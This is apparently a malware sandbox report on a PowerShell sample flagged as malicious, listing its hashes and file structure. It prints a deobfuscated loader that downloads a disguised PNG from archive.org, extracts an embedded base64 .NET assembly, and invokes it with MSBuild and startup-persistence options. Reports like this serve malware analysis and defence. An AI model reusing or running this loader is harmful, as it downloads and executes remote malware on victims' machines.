Malicious
Malicious

89a765fa19f24e1176a562db9278a6b1

PowerShell
|
MD5: 89a765fa19f24e1176a562db9278a6b1
|
Size: 1.03 MB
|
application/x-powershell

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
89a765fa19f24e1176a562db9278a6b1
Sha1
39f58c213f51c7e540711c91997acafa5d044bd3
Sha256
90e1d6f51384ef537001661e31850e2b749fc8d5e25141f09c044a77ab5ecdeb
Sha384
bf52a85b3c43d69ff7863d56fbc735bb38ce1a08f22d87192fbb73542ba8226d5cd6265cb333829e73bda54cbb640768
Sha512
39334ee73f9076034f32a5181ab9fc5e573a253462db9949e66f697059c0237874d8c9a56643ce62aa0062e88b281930b7a555281c1e8865341ed9a01ef78e8d
SSDeep
24576:aysOT1fxiVha1wcnysOT1fxiVha1wcjysOT1fxiVha1wcK:/sOPAHsOPAZsOPAP
TLSH
7125CF4E3567413AA485B0B8320A5163F09FC7D5C32AF3A2D0B0D469E195CBAE5FA773
File Structure
89a765fa19f24e1176a562db9278a6b1
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/optimized_msi_20250814/optimized_MSI.png" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==Ad4RnLlxWamRWZ0JXZ252bj9CNwcjN2YDMx8Cbk9yZy9mLzVGbpZGctR3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "MSBuild", "", "MSBuild", "", "", "", "Name_File", "js", "1", "", "", "0", "startup_onstart") } ))
89a765fa19f24e1176a562db9278a6b1 (1.03 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙